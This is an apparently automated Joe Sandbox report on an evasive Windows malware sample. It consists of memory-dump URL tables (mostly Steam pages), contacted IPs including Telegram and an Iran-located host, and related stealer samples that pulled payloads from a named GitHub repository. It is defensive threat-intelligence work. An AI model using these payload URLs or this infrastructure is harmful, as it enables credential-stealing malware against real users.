0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://store.steampowered.com/subscriber_agreement/e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://steambroadcast.akamaized.ne770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://steamcommunity.com/#e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orge770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&ampe770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://recaptcha.net/recaptcha/;e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://steamcommunity.com/discussions/e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            http://github.comYYjRtxS70h.exe, 00000000.00000002.3415219385.0000000002D6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://store.steampowered.com/stats/e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://medal.tve770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                  185.199.109.133
                                                                                                                                                                                                                  raw.githubusercontent.comNetherlands
                                                                                                                                                                                                                  54113FASTLYUSfalse
                                                                                                                                                                                                                  104.102.49.254
                                                                                                                                                                                                                  steamcommunity.comUnited States
                                                                                                                                                                                                                  16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                  37.27.43.98
                                                                                                                                                                                                                  unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                                                                  39232UNINETAZfalse
                                                                                                                                                                                                                  20.233.83.145
                                                                                                                                                                                                                  github.comUnited States
                                                                                                                                                                                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                  149.154.167.99
                                                                                                                                                                                                                  t.meUnited Kingdom
                                                                                                                                                                                                                  62041TELEGRAMRUfalse
                                                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                  Analysis ID:1579768
                                                                                                                                                                                                                  Start date and time:2024-12-23 08:59:01 +01:00
                                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                  Overall analysis duration:0h 8m 39s
                                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                  Run name:Run with higher sleep bypass
                                                                                                                                                                                                                  Number of analysed new started processes analysed:17
                                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                                  Sample name:YYjRtxS70h.exe
                                                                                                                                                                                                                  renamed because original name is a hash value
                                                                                                                                                                                                                  Original Sample Name:5a59ce92b07de68c0be8fbd7944214e2.exe
                                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                                  Classification:mal84.evad.winEXE@19/24@4/5
                                                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                                                  • Successful, ratio: 37.5%
                                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                                                  • Number of executed functions: 237
                                                                                                                                                                                                                  • Number of non-executed functions: 47
                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                                                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                                                                                                  • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 5308 because it is empty
                                                                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 5552 because it is empty
                                                                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7556 because it is empty
                                                                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7684 because it is empty
                                                                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 8104 because it is empty
                                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                  No simulations
                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  185.199.109.133cr_asm3.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                                                                                  gabe.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                                                                                  5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                                                                                  HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                                                                                  steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                                                                                  OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                                                                                  steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                                                                                  SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                                                                                                                                                                                                  • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
                                                                                                                                                                                                                  SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                  • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
                                                                                                                                                                                                                  104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                  • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                                                                                                                  http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • www.valvesoftware.com/legal.htm
                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  raw.githubusercontent.comfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                  • 185.199.110.133
                                                                                                                                                                                                                  Navan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 185.199.110.133
                                                                                                                                                                                                                  BigProject.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 185.199.110.133
                                                                                                                                                                                                                  Set-up!.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 185.199.108.133
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                  • 185.199.108.133
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                  • 185.199.111.133
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                  • 185.199.108.133
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                  • 185.199.110.133
                                                                                                                                                                                                                  58VSNPxrI4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 185.199.108.133
                                                                                                                                                                                                                  github.comfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                  • 20.233.83.145
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                  • 20.233.83.145
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                  • 20.233.83.145
                                                                                                                                                                                                                  ORDER-241221K6890PF57682456POC7893789097393.j.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                                  • 20.233.83.145
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                  • 20.233.83.145
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                  • 20.233.83.145
                                                                                                                                                                                                                  58VSNPxrI4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 20.233.83.145
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                  • 20.233.83.145
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                                                                                                                                  • 20.233.83.145
                                                                                                                                                                                                                  steamcommunity.comBVGvbpplT8.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  613vKYuY2S.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  mgEXk8ip26.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  44EPDJT1V8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  Bire1g8ahY.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                  HK8IIasL9i.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                  OGBLsboKIF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                  NfwBtCx5PR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  FASTLYUS7394231845.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 151.101.2.137
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                  • 185.199.110.133
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                  • 185.199.111.133
                                                                                                                                                                                                                  Navan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 185.199.110.133
                                                                                                                                                                                                                  BigProject.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 185.199.110.133
                                                                                                                                                                                                                  Set-up!.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 185.199.108.133
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                  • 185.199.108.133
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                  • 185.199.111.133
                                                                                                                                                                                                                  ORDER-241221K6890PF57682456POC7893789097393.j.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                                  • 199.232.192.209
                                                                                                                                                                                                                  UNINETAZnshmips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 37.27.50.214
                                                                                                                                                                                                                  nshmpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 37.27.50.208
                                                                                                                                                                                                                  7VfKPMdmiX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 37.27.43.98
                                                                                                                                                                                                                  7VfKPMdmiX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 37.27.43.98
                                                                                                                                                                                                                  sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 37.26.35.119
                                                                                                                                                                                                                  powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                  • 37.27.238.92
                                                                                                                                                                                                                  PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                  • 37.27.123.72
                                                                                                                                                                                                                  exe009.exeGet hashmaliciousEmotetBrowse
                                                                                                                                                                                                                  • 185.80.172.199
